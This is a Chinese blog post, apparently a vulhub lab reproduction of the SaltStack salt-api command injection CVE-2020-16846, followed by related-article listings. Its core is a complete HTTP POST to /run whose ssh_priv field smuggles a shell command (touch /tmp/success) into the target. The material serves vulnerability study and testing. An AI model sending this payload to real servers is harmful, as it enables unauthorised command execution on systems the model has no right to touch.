SaltStack 命令注入漏洞(CVE-2020-16846)

最新推荐文章于 2024-03-28 15:36:31 发布
最新推荐文章于 2024-03-28 15:36:31 发布
阅读量151 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119077936
版权

漏洞复现

发送如下数据包,即可执行命令:

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/x-yaml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b

在这里插入图片描述
返回靶机查看
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
PHP 漏洞全解 1-9
PushSafe
04-14 587
PHP 漏洞全解(一)-PHP 网页的安全性问题 针对 PHP 的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(S
[MySQL漏洞修复]Red Hat 7环境MYSQL原地升级方案
百川东到海,何时复西归
03-09 2521
摘要:此方案适用于MySQL8.0.16之后的版本,升级后修复以下漏洞 Oracle MySQL Server组件安全漏洞(CVE-2019-5482); Oracle MySQL Server Server 安全漏洞(CVE-2020-14878); Oracle MySQL Server 安全漏洞(CVE-2020-1967); Oracle MySQL Server 安全漏洞(CVE-2020-14663); Oracle MySQL Server 安全漏洞(CVE-2020-14678); Orac
CVE漏洞复现-CVE-2020-16846SaltStack命令注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-07 785
SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846CVE-2020-16846允许用户执行任意命令
SaltStack 远程命令执行漏洞CVE-2020-16846
最新发布
ANOrange的博客
03-28 341
本地模拟场景复现saltstack远程命令执行漏洞
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
SaltStack Shell注入CVE-2020-16846漏洞复现
Redredredfish的博客
09-15 462
漏洞概述 ①漏洞简介 2020年11月,SaltStack正式披露了两个漏洞CVE-2020-16846CVE-2020-25592。CVE-2020-25592允许任意用户使用SSH模块,CVE-2020-16846允许用户执行任意命令。链接这两个漏洞将允许未经授权的攻击者通过Salt API执行任意命令。 ②SaltStack SaltStack是基于Python开发的一套C/S架构配置管理工具,其使用server-agent通信模型部署轻松迅速,扩展性好,容易管理大批量服务器,可实现服务器之间
详述SaltStack Salt 命令注入漏洞CVE-2020-16846/25592)
smellycat000的专栏
12-01 825
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队11月3日,SaltStack 发布 Salt 安全补丁,修复了三个严重漏洞,其中两个是为了回应起初通过 ZDI 报告的5个...
SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)
YDclub的博客
11-13 630
一、背景 - 漏洞概述: SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能: • 配置管理系统,能够将远程节点维护在一个预定义的状态(例如,确保安装特定的软件包并运行特定的服务) • 分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据 2020年11月4日,SaltStack 官方发布了一则安全更新公告,其中CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令
解决“POST /runoob/ HTTP/1.1“ 403
On the road
09-17 3131
解决Django “POST /runoob/ HTTP/1.1” 403 代码 views.py from django.http import HttpResponse def runoob(request): name = request.POST.get("name") print(name) return HttpResponse('姓名:{}'.format(name)) urls.py from django.urls import re_path from
SaltStack命令注入漏洞复现(CVE-2020-16846
m0_48520508的博客
03-05 1398
0x00简介 SaltStack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。通过部署SaltStack,我们可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等。 0x01漏洞概述 CVE-2020-16846CVE-2
SaltStack 命令注入漏洞CVE-2020-16846)复现,python编写POC
wangqiao258的博客
10-10 268
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/ [root@localhost CVE-2020-16846]# docker-compose up -d 查看端口: [root@localhost CVE-2020-16846]# docker ps CONTAINER ID IMAGE COMMAND
CVE-2020-16846Saltstack未授权命令执行漏洞
Delphinidae
11-04 1020
漏洞官网地址: https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ 漏洞参考 https://www.bleepingcomputer.com/news/security/saltstack-reveals-new-critical-vulnerabilities-patch-now/ 漏洞细节:(网上有人diff的patch结果见下图) 漏洞点是:python程序中调用
CVE-2020-16846/25592 (Saltstack未授权命令执行漏洞复现)
痴人说梦梦中人
12-23 1544
一、漏洞描述         SaltStack是由thomas Hatch于2011年创建的一个开源项目,设计初衷是为了实现一个快速的远程执行系统。主要用于解决系统管理员日常会进行大量的重复性操作,例如安装软件,修改配置文件,创建用户,批量执行命令等等这些问题。        CVE-2020-16846/25592组合使用可在未授权的情况下通过salt-a
SaltStack 二修命令注入和提权漏洞
smellycat000的专栏
03-25 226
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Salt Project 再次发布补丁,修复命令注入漏洞 (CVE-2020-28243)。该漏洞影响 SaltStack S...
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全措施方面做好相应的防护工作。如果您需要更详细的信息或帮助,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值